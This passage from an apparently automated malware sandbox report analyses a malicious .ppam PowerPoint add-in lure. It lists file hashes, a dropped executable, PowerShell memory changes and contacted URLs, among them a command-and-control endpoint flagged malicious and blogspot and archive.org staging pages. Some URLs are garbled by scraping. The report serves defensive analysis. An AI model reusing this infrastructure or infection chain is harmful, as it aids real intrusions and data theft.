Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x415000(4280320) | 0x4200 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x41a000(4300800) | 0x200 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x4a0000(4849664) | 0x2000 | 1

Modify Memory | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 | 0x297008(2715656) | 0x4 | 1

Modify Control Flow | #7: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0x1034 / 0xe54 | - | | 1

Host Behavior

Type Count

Module 14

Registry 2

Mutex 1

ARTIFACTS

File

SHA256 | Filenames | Category | Filesize | MIME Type | Operations | Verdict
a782285f1b9ee7ceef60c568aabd624f8082d76eaf900f53d020f581146928bf | C:\Users\RDhJ0CNFevzX\Desktop\Request For Price quotation 1-6-2021.ppam | Sample File | 8.71 KB | application/vnd.openxmlformats-officedocument.presentationml.presentation | - | MALICIOUS
bcef816778f3ff312e9f2cd0ab87f8bef762ce2fc14841c0dbade50da371c7d6 | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\44[1].htm | Modified File | 32.90 KB | text/html | - | MALICIOUS
86e3f0a44f4d4b8dae744588b839de98f8460523609b3852e07884ca2586bb1e | ooo.bin | Embedded File | 18.00 KB | application/CDFV2 | - | MALICIOUS
2c75ad03937eee1046942d48b0fdc366e908dc00a5defc8f3b9513c7821a78b8 | C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.exe, C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | Dropped File | 254.30 KB | application/vnd.microsoft.portable-executable | Write, Access, Create, Delete | SUSPICIOUS
22ca5e3dcd26fa66a4af4b4a5d47a6a3a17f4cb9abdd03707901758b28f5c1d6 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\115981500-css_bundle_v2[1].css | Modified File | 36.12 KB | text/plain | Read, Access | CLEAN
362b69c42b10b4a9d1a79837f44f6ce3e5419d78684b94dc5ca2fe471873d3aa | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\3775400722-ieretrofit[1].js | Modified File | 26.01 KB | text/plain | Read, Access | CLEAN
2fa997e09f206cb872e70d94837c6c32a5438f86a1c962886db3497b8af26d2f | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\4154767893-widgets[1].js | Modified File | 146.35 KB | text/plain | Read, Access | CLEAN
068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\cookienotice[1].js | Modified File | 6.36 KB | text/plain | Read, Access | CLEAN
0fc52ef116f03fd95f9857856f1e2cbdfa2cacc398e066db0d8d5481739bc2d7 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\281434096-static_pages[1].css | Modified File | 3.72 KB | text/plain | Read, Access | CLEAN
21cc4dc6c3c01b84c808004173f42e3ed1b4f09551a10d69b4cec7394a1590e6 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\3101730221-analytics_autotrack[1].js | Modified File | 24.70 KB | text/plain | Read, Access | CLEAN
75f3d85ba830f388cc2ad21b8d6b3f7c8aa4b5c02acaff391ac09723a5d22970 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\KNZ1HGRK\css[1].css | Modified File | 172 bytes | text/plain | Read, Access | CLEAN
8684a32d1a10d050a26fc33192edf427a5f0c6874c590a68d77ae6e0d186bd8a | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\maia[1].css | Modified File | 42.48 KB | text/plain | Read, Access | CLEAN
2cb09c7b3e19bfc41743ca3624ef81c3258d56525647feac76aa757e0292627a | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\analytics[1].js | Modified File | 48.00 KB | text/plain | Read, Access | CLEAN
01e698231e9d93dceaa9a97f4e5cdbdbceefbea67d4e39acd0391e1cae00889b | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot | Modified File | 15.60 KB | application/vnd.ms-fontobject | Read, Access | CLEAN
49d0d1473181447caad524188bfcb1344b20a4ffa42bb0b5ff7695e379ae3b79 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\css[1].css | Modified File | 402 bytes | text/plain | Read, Access | CLEAN
9e90ea64ba9bf7c1feb8f4218448f8f1f52578ba857e235898ecfb4b97fce7eb | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | Modified File | 2.16 KB | application/octet-stream | Write, Read, Access, Create | CLEAN
be869a73a160440e8bfc5c7d84a907febd61075d920d51c7d0097d7295c865cd | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\KFOmCnqEu92Fr1Mu4mxO[1].eot | Modified File | 17.40 KB | application/vnd.ms-fontobject | Read, Access | CLEAN
1422b27938e77fd6809d3d1ae0f33fe2eec4bcc5cd3d9d84f6807fb462395780 | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\44[3].htm | Modified File | 27.75 KB | text/html | - | CLEAN
d172d750493be64a7ed84dec1dd2a0d787ba42f78bc694b0858f152c52b6620b | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\icon18_wrench_allbkg[1].png | Dropped File | 475 bytes | image/png | - | CLEAN
b1313dd95eaf63f33f86f72f09e2ecd700d11159a8693210c37470fcb84038f7 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT | Dropped File | 47.97 KB | application/octet-stream | Access, Create | CLEAN
0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\q2ct0htu\body_gradient_tile_light[1].png | Dropped File | 95 bytes | image/png | - | CLEAN
ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044 | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\knz1hgrk\gradients_light[1].png | Dropped File | 403 bytes | image/png | - | CLEAN
efea3840519cec6828835e879cb29cf9c45d7f45a8e920852b9ee2129bcfeb95 | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\q2ct0htu\blogin[1].htm | Dropped File | 147.90 KB | text/html | - | CLEAN
cbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7 | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\dzqw0fjc\blogger-logotype-color-black-1x[1].png | Dropped File | 1.13 KB | image/png | - | CLEAN
e641ff8107a4197ded9f558d1891e716811e9a7f109f14e876f5a8394844dc34 | c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1560258661-3990802383-1811730007-1000\3d3578a85286f88c6cd9d151e4412949_03845cb8-7441-4a2f-8c0f-c90408af5778 | Dropped File | 53 bytes | application/octet-stream | - | CLEAN
859ffdca62ee0971821a4b2dedfc023d0f9a021391b5ac336ddb49d53d28330e | C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.hdb | Dropped File | 4 bytes | text/plain | Write, Access, Create, Delete | CLEAN
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b | C:\Users\RDhJ0CNFevzX\AppData\Roaming\9EDDE9\9BDC8A.lck | Dropped File | 1 bytes | application/octet-stream | Write, Access, Create, Delete | CLEAN
7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754 | C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\error[1], C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\KNZ1HGRK\error[1], C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\error[1] | Dropped File | 3.17 KB | text/html | Write, Access, Create | CLEAN
82f8ca6d30d6f9c3263743cfe1e15f47a4c268d464a7c18bc6b69dd97e12fb57 | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcookies\7yx6400f.txt | Dropped File | 98 bytes | text/plain | - | CLEAN
4c3ea140e5dafcf0a6714eb5d4b0991e6385466db3e47d2f3712dd6e5a2e281d | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcookies\u2phfk42.txt | Dropped File | 195 bytes | text/plain | - | CLEAN
353fd628b7f6e7d426e5d6a27d1bc3ac22fa7f812e7594cf2ec5ca1175785b50 | c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1560258661-3990802383-1811730007-1000\3d3578a85286f88c6cd9d151e4412949_03845cb8-7441-4a2f-8c0f-c90408af5778 | Dropped File | 53 bytes | application/octet-stream | - | CLEAN
e6f579ba8364a6c6733b815b6efb470cfad2240c3c377c1f5c01f8faf8d95501 | - | Downloaded File | 288 bytes | application/octet-stream | - | CLEAN
32b116ee819bd760f9526bb1bcefd399e2ac423cca65247bab7d5ab5baa606f3 | - | Downloaded File | 10.04 KB | text/html | - | CLEAN
ff6fe43e4a4d300b15926f0f2f546d300193c202d097d4a49e23d86827063d6b | - | Downloaded File | 186 bytes | application/octet-stream | - | CLEAN
9811b34e5885a16e5001187e9065a0886c709e028e2eff8a485374dcaf0bc6ed | - | Downloaded File | 159 bytes | application/octet-stream | - | CLEAN
039d5eeead864652465362a1cefa85d77c0b39221a1a67fc8b4d421fc8c93d38 | - | Downloaded File | 217 bytes | text/html | - | CLEAN

Filename

Filename | Category | Operations | Verdict
C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL | Accessed File | Access | CLEAN
C:\Windows\SysWOW64\mshta.exe | Accessed File | Access | CLEAN
Win.ini | Accessed File | Read, Access | CLEAN
System Paging File | Accessed File | Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\115981500-css_bundle_v2[1].css | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\3775400722-ieretrofit[1].js | Modified File | Read, Access | CLEAN
C:\Windows\SYSTEM32\jscript9.dll | Accessed File | Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT | Dropped File | Access, Create | CLEAN
C:\Windows\SysWOW64\schtasks.exe | Accessed File | Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\cookienotice[1].js | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\error[1] | Dropped File | Write, Access, Create | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\KNZ1HGRK\css[1].css | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\DZQW0FJC\maia[1].css | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\4154767893-widgets[1].js | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\error[1] | Dropped File | Write, Access, Create | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\281434096-static_pages[1].css | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\Q2CT0HTU\analytics[1].js | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\3UNUC0QX\3101730221-analytics_autotrack[1].js | Modified File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\KNZ1HGRK\error[1] | Dropped File | Write, Access, Create | CLEAN
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Accessed File | Access | CLEAN
C:\Windows\system32 | Accessed File | Access | CLEAN
C:\Windows | Accessed File | Access | CLEAN
C:\Windows\System32\Wbem | Accessed File | Access | CLEAN
C:\Windows\System32\WindowsPowerShell\v1.0\ | Accessed File | Access | CLEAN
C:\Program Files (x86)\Microsoft Office\root\Client | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules | Accessed File | Access | CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Appx | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache\BranchCache.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Dism | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\International | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\ISE | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Kds | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psm1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.cdxml | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.xaml | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.dll | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psm1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.cdxml | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.dll | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\MsDtc | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\MsDtc\MsDtc.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetConnection\NetConnection.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetEventPacketCapture | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetLbfo | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetLbfo\NetLbfo.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetNat | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetNat\NetNat.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetQos | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetQos\NetQos.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetSecurity | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetSecurity\NetSecurity.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetSwitchTeam | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetTCPIP | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetworkConnectivityStatus | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetworkTransition | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PKI | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PKI\PKI.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PnpDevice | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PnpDevice\PnpDevice.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PrintManagement | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PrintManagement\PrintManagement.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PSDesiredStateConfiguration | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PSDiagnostics | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\SecureBoot\SecureBoot.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Storage | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Storage\Storage.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\TLS | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\TLS\TLS.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\TroubleshootingPack | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\TrustedPlatformModule | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\VpnClient | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\VpnClient\VpnClient.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Wdac | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Wdac\Wdac.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\WindowsDeveloperLicense | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\WindowsErrorReporting | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\WindowsUpdate | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Modules.psd1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Modules.psm1 | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Modules.cdxml | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Modules.xaml | Accessed File | Access | CLEAN
c:\windows\system32\windowspowershell\v1.0\Modules\Modules.dll | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1 | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psd1 | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psm1 | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.cdxml | Accessed File | Access | CLEAN
C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.xaml | Accessed File | Access | CLEAN
Reduced dataset

URL

URL | Category | IP Address | Country | HTTP Methods | Verdict
http://173.208.204.37/k.php/SczbkxCQZQyVr | - | 173.208.204.37 | - | POST | MALICIOUS
https://1230948%[email protected]m/awkdhikhasd | - | 67.199.248.14 | - | GET | CLEAN
https://ia801500.us.archive.org/0/items/1_20210527_20210527/1.txt | - | - | - | - | CLEAN
http://1230948%[email protected]ogspot.com/p/44.html\ | - | - | - | - | CLEAN
http://1230948%[email protected]ogspot.com/p/44.html | - | 142.250.186.129 | - | GET | CLEAN
http://0v2x.blogspot.com/p/44.html | - | 142.250.186.129 | - | GET | CLEAN
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral | - | - | - | GET | CLEAN
https://0v2x.blogspot.com/p/44.html | - | 142.250.186.129 | - | GET | CLEAN
https://www.blogger.com/static/v1/widgets/115981500-css_bundle_v2.css | - | - | - | GET | CLEAN
https://l0mx.blogspot.com/favicon.ico | - | - | - | GET | CLEAN
https://l0mx.blogspot.com/p/44.html | - | 142.250.186.129 | - | GET | CLEAN
https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4338430458218760041&zx=7daa74e6-a63d-414d-b329-4c3a73b1266b | - | - | - | GET | CLEAN
https://l0mx.blogspot.com | - | - | - | GET | CLEAN
https://www.blogger.com | - | - | - | GET | CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https://l0mx.blogspot.com/p/44.html&type=blog | - | - | - | GET | CLEAN
https://resources.blogblog.com/img/icon18_wrench_allbkg.png | - | - | - | GET | CLEAN
https://www.blogger.com/static/v1/widgets/4154767893-widgets.js | - | - | - | GET | CLEAN
http://fonts.googleapis.com/css?family=Open+Sans:300 | - | - | - | GET | CLEAN
http://www.google.com/css/maia.css | - | - | - | GET | CLEAN
https://www.blogger.com/static/v1/v-css/281434096-static_pages.css | - | - | - | GET | CLEAN
https://www.google.de/intl/de/about/products?tab=jh | - | - | - | GET | CLEAN
https://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app | - | - | - | GET | CLEAN
https://www.google.de/webhp?tab=jw | - | - | - | GET | CLEAN
https://maps.google.de/maps?hl=de&tab=jl | - | - | - | GET | CLEAN
https://www.youtube.com/?gl=DE&tab=j1 | - | - | - | GET | CLEAN
https://play.google.com/?hl=de&tab=j8 | - | - | - | GET | CLEAN
